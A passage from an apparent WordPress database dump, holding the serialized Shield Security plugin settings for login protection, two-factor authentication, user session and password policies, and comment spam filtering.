Customer\";}}s:9:\"link_info\";s:19:\"https://shsec.io/4v\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:243;s:4:\"name\";s:30:\"Enforce - Email Authentication\";s:7:\"summary\";s:46:\"All User Roles Subject To Email Authentication\";s:11:\"description\";s:130:\"Enforces email-based authentication on all users with the selected roles. Note: This setting only applies to email authentication.\";}i:8;a:11:{s:3:\"key\";s:18:\"email_any_user_set\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gj\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:142;s:4:\"name\";s:14:\"Allow Any User\";s:7:\"summary\";s:60:\"Allow Any User To Turn-On Two-Factor Authentication By Email\";s:11:\"description\";s:61:\"Allow Any User To Turn-On Two-Factor Authentication By Email.\";}i:9;a:10:{s:3:\"key\";s:20:\"enable_antibot_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/k0\";s:9:\"link_blog\";s:19:\"https://shsec.io/jo\";s:9:\"beacon_id\";i:426;s:4:\"name\";s:7:\"AntiBot\";s:7:\"summary\";s:41:\"Use Experimental AntiBot Detection Engine\";s:11:\"description\";s:76:\"Use Shield\'s AntiBot Detection Engine In-Place of GASP/CAPTCHA Bot checking.\";}i:10;a:11:{s:3:\"key\";s:24:\"bot_protection_locations\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:5:\"login\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:5:\"login\";s:4:\"text\";s:5:\"Login\";}i:1;a:2:{s:9:\"value_key\";s:8:\"register\";s:4:\"text\";s:8:\"Register\";}i:2;a:2:{s:9:\"value_key\";s:8:\"password\";s:4:\"text\";s:13:\"Lost Password\";}i:3;a:2:{s:9:\"value_key\";s:12:\"checkout_woo\";s:4:\"text\";s:22:\"Checkout (WooCommerce)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dv\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:314;s:4:\"name\";s:20:\"Protection Locations\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:64:\"Choose for which forms bot protection measures will be deployed.\";}i:11;a:11:{s:3:\"key\";s:20:\"login_limit_interval\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"5\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3q\";s:9:\"link_blog\";s:19:\"https://shsec.io/9o\";s:9:\"beacon_id\";i:242;s:4:\"name\";s:23:\"Login Cooldown Interval\";s:7:\"summary\";s:39:\"Limit login attempts to every X seconds\";s:11:\"description\";s:109:\"WordPress will process only ONE login attempt for every number of seconds specified. Zero (0) turns this off.\";}i:12;a:10:{s:3:\"key\";s:23:\"enable_login_gasp_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3r\";s:9:\"link_blog\";s:19:\"https://shsec.io/9n\";s:9:\"beacon_id\";i:313;s:4:\"name\";s:14:\"Bot Protection\";s:7:\"summary\";s:54:\"Protect WP Login From Automated Login Attempts By Bots\";s:11:\"description\";s:138:\"Adds a dynamically (Javascript) generated checkbox to the login form that prevents bots using automated login techniques. Recommended: ON.\";}i:13;a:11:{s:3:\"key\";s:29:\"enable_google_recaptcha_login\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9m\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:14:\"Enable CAPTCHA\";s:11:\"description\";s:32:\"Use CAPTCHA on the login screen.\";}i:14;a:12:{s:3:\"key\";s:16:\"antibot_form_ids\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}s:9:\"link_info\";s:19:\"https://shsec.io/hg\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:144;s:4:\"name\";s:13:\"AntiBot Forms\";s:7:\"summary\";s:66:\"Enter The IDs Of The 3rd Party Login Forms For Use With AntiBot JS\";s:11:\"description\";s:32:\"For Use With AnitBot JS (above).\";}i:15;a:10:{s:3:\"key\";s:10:\"enable_u2f\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Allow U2F\";s:7:\"summary\";s:33:\"Allow Registration Of U2F Devices\";s:11:\"description\";s:34:\"Allow Registration Of U2F Devices.\";}i:16;a:10:{s:3:\"key\";s:14:\"enable_yubikey\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4f\";s:9:\"link_blog\";s:19:\"https://shsec.io/9t\";s:9:\"beacon_id\";i:358;s:4:\"name\";s:17:\"Allow Yubikey OTP\";s:7:\"summary\";s:49:\"Allow Yubikey Registration For One Time Passwords\";s:11:\"description\";s:99:\"Combined with your Yubikey API Key (below) this will form the basis of your Yubikey Authentication.\";}i:17;a:11:{s:3:\"key\";s:14:\"yubikey_app_id\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:360;s:4:\"name\";s:14:\"Yubikey App ID\";s:7:\"summary\";s:26:\"Your Unique Yubikey App ID\";s:11:\"description\";s:91:\"Combined with your Yubikey API Key this will form the basis of your Yubikey Authentication.\";}i:18;a:11:{s:3:\"key\";s:15:\"yubikey_api_key\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:360;s:4:\"name\";s:15:\"Yubikey API Key\";s:7:\"summary\";s:31:\"Your Unique Yubikey App API Key\";s:11:\"description\";s:90:\"Combined with your Yubikey App ID this will form the basis of your Yubikey Authentication.\";}i:19;a:11:{s:3:\"key\";s:13:\"text_imahuman\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"GASP Checkbox Text\";s:7:\"summary\";s:47:\"The Message Displayed Next To The GASP Checkbox\";s:11:\"description\";s:99:\"You can change the text displayed to the user beside the checkbox if you need a customized message.\";}i:20;a:11:{s:3:\"key\";s:19:\"text_pleasecheckbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"GASP Alert Text\";s:7:\"summary\";s:55:\"The Message Displayed If The User Doesn\'t Check The Box\";s:11:\"description\";s:95:\"You can change the text displayed to the user in the alert message if they don\'t check the box.\";}i:21;a:6:{s:3:\"key\";s:26:\"email_can_send_verified_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:22;a:6:{s:3:\"key\";s:8:\"gasp_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:23;a:5:{s:3:\"key\";s:21:\"use_login_intent_page\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:5:\"value\";b:1;}}s:11:\"definitions\";a:2:{s:20:\"login_intent_timeout\";i:5;s:6:\"events\";a:16:{s:23:\"2fa_backupcode_verified\";a:0:{}s:19:\"2fa_backupcode_fail\";a:1:{s:7:\"offense\";b:1;}s:18:\"2fa_email_verified\";a:0:{}s:21:\"2fa_email_verify_fail\";a:1:{s:7:\"offense\";b:1;}s:23:\"2fa_googleauth_verified\";a:0:{}s:15:\"2fa_google_fail\";a:1:{s:7:\"offense\";b:1;}s:20:\"2fa_yubikey_verified\";a:0:{}s:16:\"2fa_yubikey_fail\";a:1:{s:7:\"offense\";b:1;}s:22:\"2fa_email_send_success\";a:0:{}s:19:\"2fa_email_send_fail\";a:0:{}s:13:\"cooldown_fail\";a:0:{}s:13:\"honeypot_fail\";a:0:{}s:11:\"botbox_fail\";a:0:{}s:11:\"login_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:14:\"hide_login_url\";a:1:{s:5:\"audit\";b:0;}s:11:\"2fa_success\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468220,'_site_transient_shield_mod_config_e98d7077bafda99d19fce306d6112e8e','a:6:{s:4:\"slug\";s:15:\"user_management\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"user_management\";s:4:\"name\";s:15:\"User Management\";s:12:\"sidebar_name\";s:5:\"Users\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:15:\"user_management\";s:7:\"tagline\";s:61:\"Control user sessions, duration, timeouts and account sharing\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:8:\"sections\";a:7:{i:0;a:6:{s:4:\"slug\";s:31:\"section_user_session_management\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"User Session Management\";s:11:\"title_short\";s:15:\"Session Options\";s:9:\"beacon_id\";i:397;s:7:\"summary\";a:2:{i:0;s:119:\"Purpose - Allows you to better control user sessions on your site and expire idle sessions and prevent account sharing.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_user_reg\";s:5:\"title\";s:17:\"User Registration\";s:11:\"title_short\";s:17:\"User Registration\";s:9:\"beacon_id\";i:145;s:7:\"summary\";a:2:{i:0;s:53:\"Purpose - Control user registration and prevent SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:6:{s:4:\"slug\";s:17:\"section_passwords\";s:4:\"reqs\";a:1:{s:6:\"wp_min\";s:3:\"4.4\";}s:5:\"title\";s:17:\"Password Policies\";s:11:\"title_short\";s:17:\"Password Policies\";s:9:\"beacon_id\";i:256;s:7:\"summary\";a:2:{i:0;s:69:\"Purpose - Have full control over passwords used by users on the site.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:3;a:5:{s:4:\"slug\";s:15:\"section_suspend\";s:5:\"title\";s:36:\"Automatic And Manual User Suspension\";s:11:\"title_short\";s:15:\"User Suspension\";s:9:\"beacon_id\";i:273;s:7:\"summary\";a:2:{i:0;s:75:\"Purpose - Automatically suspend accounts to prevent login by certain users.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:4;a:5:{s:4:\"slug\";s:32:\"section_admin_login_notification\";s:5:\"title\";s:24:\"Admin Login Notification\";s:11:\"title_short\";s:13:\"Notifications\";s:9:\"beacon_id\";i:147;s:7:\"summary\";a:2:{i:0;s:125:\"Purpose - So you can be made aware of when a WordPress administrator has logged into your site when you are not expecting it.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:5;a:5:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:5:\"title\";s:30:\"Enable Module: User Management\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:273;s:7:\"summary\";a:2:{i:0;s:148:\"Purpose - User Management offers real user sessions, finer control over user session time-out, and ensures users have logged-in in a correct manner.\";i:1;s:60:\"Recommendation - Keep the User Management feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:11:{s:3:\"key\";s:22:\"enable_user_management\";s:7:\"section\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e3\";s:9:\"link_blog\";s:19:\"https://shsec.io/hi\";s:9:\"beacon_id\";i:273;s:4:\"name\";s:22:\"Enable User Management\";s:7:\"summary\";s:46:\"Enable (or Disable) The User Management module\";s:11:\"description\";s:74:\"Un-Checking this option will completely disable the User Management module\";}i:1;a:12:{s:3:\"key\";s:36:\"enable_user_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:7:\"premium\";b:1;s:9:\"sensitive\";b:0;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e2\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:147;s:4:\"name\";s:29:\"User Login Notification Email\";s:7:\"summary\";s:58:\"Send Email Notification To Each User Upon Successful Login\";s:11:\"description\";s:85:\"A notification is sent to each user when a successful login occurs for their account.\";}i:2;a:10:{s:3:\"key\";s:37:\"enable_admin_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Admin Login Notification Email\";s:7:\"summary\";s:53:\"Send An Notification Email When Administrator Logs In\";s:11:\"description\";s:168:\"If you would like to be notified every time an administrator user logs into this WordPress site, enter a notification email address. No email address - No Notification.\";}i:3;a:10:{s:3:\"key\";s:24:\"session_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:2;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Session Timeout\";s:7:\"summary\";s:65:\"Specify How Many Days After Login To Automatically Force Re-Login\";s:11:\"description\";s:75:\"WordPress default is 2 days, or 14 days if you check the \'Remember Me\' box.\";}i:4;a:11:{s:3:\"key\";s:29:\"session_idle_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:48;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:75:\"https://support.getshieldsecurity.com/support/solutions/articles/3000070590\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:397;s:4:\"name\";s:12:\"Idle Timeout\";s:7:\"summary\";s:68:\"Specify How Many Hours After Inactivity To Automatically Logout User\";s:11:\"description\";s:157:\"If the user is inactive for the number of hours specified, they will be forcefully logged out next time they return. Set this to \'0\' to turn off this option.\";}i:5;a:10:{s:3:\"key\";s:21:\"session_lock_location\";s:7:\"section\";s:31:\"section_user_session_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Lock To Location\";s:7:\"summary\";s:34:\"Locks A User Session To IP address\";s:11:\"description\";s:211:\"When selected, a session is restricted to the same IP address as when the user logged in. If a logged-in user\'s IP address changes, the session will be invalidated and they\'ll be forced to re-login to WordPress.\";}i:6;a:10:{s:3:\"key\";s:33:\"session_username_concurrent_limit\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Max Simultaneous Sessions\";s:7:\"summary\";s:49:\"Limit Simultaneous Sessions For The Same Username\";s:11:\"description\";s:137:\"The number provided here is the maximum number of simultaneous, distinct, sessions allowed for any given username. Use \'0\' for no limits.\";}i:7;a:11:{s:3:\"key\";s:18:\"reg_email_validate\";s:7:\"section\";s:16:\"section_user_reg\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:3:\"log\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:8:\"Log Only\";}i:2;a:2:{s:9:\"value_key\";s:7:\"offense\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:24:\"Immediate Block and Kill\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:24:\"Validate Email Addresses\";s:7:\"summary\";s:55:\"Validate Email Addresses When User Attempts To Register\";s:11:\"description\";s:56:\"Validate Email Addresses When User Attempts To Register.\";}i:8;a:10:{s:3:\"key\";s:12:\"email_checks\";s:7:\"section\";s:16:\"section_user_reg\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:6:\"syntax\";i:1;s:6:\"domain\";}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"syntax\";s:4:\"text\";s:20:\"Email Address Syntax\";}i:1;a:2:{s:9:\"value_key\";s:17:\"domain_registered\";s:4:\"text\";s:20:\"Domain Is Registered\";}i:2;a:2:{s:9:\"value_key\";s:15:\"domain_resolves\";s:4:\"text\";s:20:\"Domain Resolve To IP\";}i:3;a:2:{s:9:\"value_key\";s:2:\"mx\";s:4:\"text\";s:9:\"Domain MX\";}i:4;a:2:{s:9:\"value_key\";s:13:\"nondisposable\";s:4:\"text\";s:24:\"Disposable Email Service\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:12:\"Email Checks\";s:7:\"summary\";s:48:\"The Email Address Properties That Will Be Tested\";s:11:\"description\";s:14:\"Select which .\";}i:9;a:10:{s:3:\"key\";s:24:\"enable_password_policies\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/e1\";s:9:\"link_blog\";s:19:\"https://shsec.io/c4\";s:9:\"beacon_id\";i:146;s:4:\"name\";s:24:\"Enable Password Policies\";s:7:\"summary\";s:34:\"Enable The Password Policies Below\";s:11:\"description\";s:34:\"Turn on/off all password policies.\";}i:10;a:9:{s:3:\"key\";s:18:\"pass_prevent_pwned\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/by\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Prevent Pwned Passwords\";s:7:\"summary\";s:30:\"Prevent Use Of Pwned Passwords\";s:11:\"description\";s:94:\"Prevents users from using any passwords found on the public available list of pwned passwords.\";}i:11;a:10:{s:3:\"key\";s:15:\"pass_min_length\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"12\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Minimum Length\";s:7:\"summary\";s:23:\"Minimum Password Length\";s:11:\"description\";s:79:\"All passwords that a user sets must be at least this many characters in length.\";}i:12;a:11:{s:3:\"key\";s:17:\"pass_min_strength\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:1:\"4\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:9:\"Very Weak\";}i:1;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Weak\";}i:2;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:6:\"Strong\";}i:4;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:11:\"Very Strong\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Minimum Strength\";s:7:\"summary\";s:25:\"Minimum Password Strength\";s:11:\"description\";s:63:\"All passwords that a user sets must meet this minimum strength.\";}i:13;a:10:{s:3:\"key\";s:19:\"pass_force_existing\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Apply To Existing Users\";s:7:\"summary\";s:61:\"Apply Password Policies To Existing Users and Their Passwords\";s:11:\"description\";s:104:\"Forces existing users to update their passwords if they don\'t meet requirements, after they next login .\";}i:14;a:11:{s:3:\"key\";s:11:\"pass_expire\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Password Expiration\";s:7:\"summary\";s:37:\"Passwords Expire After This Many Days\";s:11:\"description\";s:81:\"Users will be forced to reset their passwords after the number of days specified.\";}i:15;a:11:{s:3:\"key\";s:14:\"manual_suspend\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/fq\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:399;s:4:\"name\";s:28:\"Allow Manual User Suspension\";s:7:\"summary\";s:47:\"Manually Suspend User Accounts To Prevent Login\";s:11:\"description\";s:58:\"Users may be suspended by administrators to prevent login.\";}i:16;a:11:{s:3:\"key\";s:13:\"auto_password\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/fs\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:30:\"Auto-Suspend Expired Passwords\";s:7:\"summary\";s:50:\"Automatically Suspend Users With Expired Passwords\";s:11:\"description\";s:63:\"Suspend login by users and require password reset to unsuspend.\";}i:17;a:12:{s:3:\"key\";s:14:\"auto_idle_days\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:18;a:11:{s:3:\"key\";s:15:\"auto_idle_roles\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:19;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:20;a:5:{s:3:\"key\";s:22:\"hard_suspended_userids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:3:{s:29:\"pwned_api_url_password_single\";s:45:\"https://api.pwnedpasswords.com/pwnedpassword/\";s:28:\"pwned_api_url_password_range\";s:37:\"https://api.pwnedpasswords.com/range/\";s:6:\"events\";a:12:{s:16:\"session_notfound\";a:0:{}s:15:\"session_expired\";a:0:{}s:12:\"session_idle\";a:0:{}s:14:\"session_iplock\";a:0:{}s:19:\"session_browserlock\";a:0:{}s:18:\"session_unverified\";a:0:{}s:16:\"password_expired\";a:0:{}s:28:\"password_policy_force_change\";a:1:{s:6:\"recent\";b:1;}s:21:\"password_policy_block\";a:1:{s:6:\"recent\";b:1;}s:19:\"user_hard_suspended\";a:1:{s:6:\"recent\";b:1;}s:21:\"user_hard_unsuspended\";a:0:{}s:17:\"reg_email_invalid\";a:1:{s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468221,'_site_transient_shield_mod_config_61c66b862e8c5cd5445f87065a9efffb','a:7:{s:4:\"slug\";s:15:\"comments_filter\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"comments_filter\";s:4:\"name\";s:13:\"Comments SPAM\";s:12:\"sidebar_name\";s:4:\"SPAM\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:14:\"commentsfilter\";s:7:\"tagline\";s:42:\"Block comment SPAM and retain your privacy\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:50;}s:13:\"admin_notices\";a:1:{s:15:\"akismet-running\";a:4:{s:2:\"id\";s:15:\"akismet-running\";s:12:\"plugin_admin\";s:3:\"yes\";s:16:\"plugin_page_only\";b:1;s:4:\"type\";s:7:\"warning\";}}s:8:\"sections\";a:6:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:42:\"section_bot_comment_spam_protection_filter\";s:5:\"title\";s:44:\"Automatic Bot Comment SPAM Protection Filter\";s:11:\"title_short\";s:8:\"Bot SPAM\";s:9:\"beacon_id\";i:260;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Blocks 100% of all automated bot-generated comment SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:25:\"section_human_spam_filter\";s:5:\"title\";s:36:\"Human Comment SPAM Protection Filter\";s:11:\"title_short\";s:10:\"Human SPAM\";s:9:\"beacon_id\";i:262;s:7:\"summary\";a:2:{i:0;s:78:\"Purpose - Uses a 3rd party SPAM dictionary to detect human-based comment SPAM.\";i:1;s:176:\"Recommendation - Use of this feature is highly recommend.This tool, unlike other SPAM tools such as Akismet, will not send your comment data to 3rd party services for analysis.\";}}i:2;a:5:{s:4:\"slug\";s:31:\"section_bot_comment_spam_common\";s:5:\"title\";s:37:\"Common Settings For All SPAM Scanning\";s:11:\"title_short\";s:15:\"Common Settings\";s:9:\"beacon_id\";i:152;s:7:\"summary\";a:1:{i:0;s:59:\"Purpose - Settings that apply to all comment SPAM scanning.\";}}i:3;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:403;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: 